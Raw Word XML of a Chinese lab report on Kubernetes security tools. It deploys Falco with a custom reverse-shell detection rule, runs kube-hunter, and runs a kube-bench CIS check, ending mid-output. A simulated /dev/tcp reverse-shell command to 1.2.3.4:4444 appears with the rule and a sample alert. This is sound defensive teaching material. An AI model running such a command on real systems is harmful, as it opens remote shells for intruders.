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8304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云原生安全工具实践报告（Falco + kube-hunter + kube-bench）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56421CA6" w14:textId="4B382552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实验日期：2026-04-14</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>实验人员：</w:t>
      </w:r>
      <w:r w:rsidR="009A2B34">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>鹤胡</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>实验平台：Killercoda Kubernetes Playground（K8s v1.35）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4151F13C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pict w14:anchorId="104F6581">
          <v:rect id="_x0000_i1102" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA057F8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一、实验目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455BC8BE" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>理解 Kubernetes 集群基本结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D310068" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>部署并使用 Falco 监控容器异常行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE97864" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>使用 kube-hunter 扫描集群安全弱点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC494E" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>使用 kube-bench 检查集群配置合规性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5054F8EC" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>掌握自定义 Falco 规则的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE496D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pict w14:anchorId="50F5CCBF">
          <v:rect id="_x0000_i1103" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B3D6AD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二、环境信息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7889"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C22112" w:rsidRPr="00C22112" w14:paraId="72354E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FA342" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C22112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F0EB" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C22112">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C22112" w:rsidRPr="00C22112" w14:paraId="11663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8FD0" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>集群节点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BC0F4" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>controlplane（主节点）、node01（工作节点）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C22112" w:rsidRPr="00C22112" w14:paraId="7A1DF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A0A9" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>工具版本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2FDC" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>Falco 0.43.1, kube-hunter 0.6.8, kube-bench 0.6.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C22112" w:rsidRPr="00C22112" w14:paraId="1E589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57D7" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>部署方式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BCE5E" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>Helm（Falco）、Docker 容器（kube-hunter、kube-bench）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47CB5BFD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pict w14:anchorId="00BC8EC9">
          <v:rect id="_x0000_i1104" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F94D0A6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三、Falco 运行时安全监控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B15650A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3.1 部署 Falco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A293BF" w14:textId="779635DD" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080AEEFE" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>helm repo add falcosecurity https://falcosecurity.github.io/charts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F2944" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>helm install falco falcosecurity/falco --namespace falco --create-namespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775EE8DF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实际输出示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F18A4AE" w14:textId="31BC793F" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F726FD1" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">NAME: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C22112">
        <w:t>falco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24387F24" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>LAST DEPLOYED: Tue Apr 14 12:06:00 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2672563B" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>NAMESPACE: falco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62DA39" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>STATUS: deployed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918DD8F" w14:textId="5D257F38" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>验证 Pod 状态：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F88EFE" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>kubectl get pods -n falco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF7019" w14:textId="36545AA0" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287C5AAE" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>NAME          READY   STATUS    RESTARTS   AGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF98C2" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>falco-5zcfc   2/2     Running   0          50s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C841241" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>falco-gfw7h   2/2     Running   0          81s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BD4843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解读：每个节点上运行一个 Falco Pod，状态为 Running，表示实时监控已生效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A2DE7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3.2 添加自定义规则（检测反弹 shell）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F9843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创建规则文件 /etc/falco/rules.d/custom_rules.yaml，内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5115A8" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B8CDA3" w14:textId="66EAB3C6" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>- rule: Reverse Shell ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5A694" w14:textId="54FF9649" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t xml:space="preserve">  desc: Detect reverse shell using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC456BB" w14:textId="52510CAA" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t xml:space="preserve">  condition: (spawned_process and proc.name = "" and proc.cmdline contains " -i &gt;&amp; /dev/tcp/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D400B0A" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t xml:space="preserve">  output: "Reverse shell detected (command=%proc.cmdline)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF466EF" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t xml:space="preserve">  priority: CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571DB2AB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验证规则加载（查看 Falco 日志）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295C2DC7" w14:textId="37F5921E" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5054F519" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>Tue Apr 14 12:14:39 2026:    /etc/falco/rules.d/custom_rules.yaml | schema validation: ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664B96B2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解读：规则文件被成功加载，Falco 可以检测反弹 shell 行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE129F7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3.3 模拟攻击与告警示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6513D9DF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如果攻击者在一个容器内执行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459A24A4" w14:textId="0A5FAD34" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457C7F3F" w14:textId="13845665" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t xml:space="preserve"> -i &gt;&amp; /dev/tcp/1.2.3.4/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542A5B4B" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>Falco 会产生如下告警（示例）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD2A0E" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464344CF" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB39E6E" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t xml:space="preserve">  "time": "2026-04-14T12:15:00.123456789Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED1A4A7" w14:textId="56F32480" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t xml:space="preserve">  "rule": "Reverse Shell ()",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA6411C" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t xml:space="preserve">  "priority": "CRITICAL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C899D" w14:textId="48CC2B1A" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t xml:space="preserve">  "output": "Reverse shell detected (command= -i &gt;&amp; /dev/tcp/1.2.3.4/4444 0&gt;&amp;1)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D83FF2" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A270B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解读：Falco 实时检测到反弹 shell，并发出严重告警，安全人员可立即响应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A589BB3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pict w14:anchorId="5CBE6EDD">
          <v:rect id="_x0000_i1105" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6459FF89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四、kube-hunter 主动安全扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD1EFB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命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A78D2" w14:textId="5B9E4DCC" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A49F106" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>docker run --rm -it aquasec/kube-hunter --pod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B039D6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实际输出节选：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7AB99" w14:textId="62F35B2B" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6ED2CA" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>Nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459970CA" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>+-------------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A88D452" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>| TYPE        | LOCATION   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E460695" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>+-------------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F777631" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>| Node/Master | 172.17.0.1 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FE1D80" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>+-------------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BEA054" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112"/>
    <w:p w14:paraId="43196E6A" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AD9F51" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>+--------+----------------------+----------------------+------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22112">
        <w:lastRenderedPageBreak/>
        <w:t>----+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC5B2DA" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>| ID     | LOCATION             | VULNERABILITY        | EVIDENCE             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B3987" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>+--------+----------------------+----------------------+----------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378AABD6" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>| None   | Local to Pod         | CAP_NET_RAW Enabled  | CAP_NET_RAW is       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF08A2" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>|        |                      |                      | enabled by default   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B0B2A" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>+--------+----------------------+----------------------+----------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C581BB5" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>| KHV002 | 172.17.0.1:6443      | K8s Version          | v1.35.1              |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2BB33D" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>|        |                      | Disclosure           |                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668805BF" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>+--------+----------------------+----------------------+----------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B516162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解读：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C119CC8" w14:textId="2CFD6B65" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CAP_NET_RAW Enabled：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22112">
        <w:t>Pod 默认具有网络攻击能力（ARP 欺骗、IP 欺骗），建议在 Pod 的 SecurityCon 中禁用该能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB876A0" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>K8s Version Disclosure：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22112">
        <w:t>暴露了集群版本，攻击者可利用已知漏洞，建议限制未授权访问 /version 端点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABCD63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pict w14:anchorId="10AFF6D2">
          <v:rect id="_x0000_i1106" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F33311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五、kube-bench CIS 基线检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFB06CB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正确命令（新版本）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4057A3" w14:textId="631B84A4" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6EE367" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>docker run --rm -v /etc/kubernetes:/etc/kubernetes aquasec/kube-bench:latest run --targets master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F16C26E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实际输出节选：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072DD1E7" w14:textId="110DD551" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DA3987" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>[INFO] 1 Master Node Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DDA2C4" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>[INFO] 1.1 Master Node Configuration Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BA3849" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:lastRenderedPageBreak/>
        <w:t>[PASS] 1.1.1 Ensure that the API server pod specification file permissions are set to 644 or more restrictive (Automated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0DFE65" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>[PASS] 1.1.2 Ensure that the API server pod specification file ownership is set to root:root (Automated)</w:t>
      </w:r>
    </w:p>
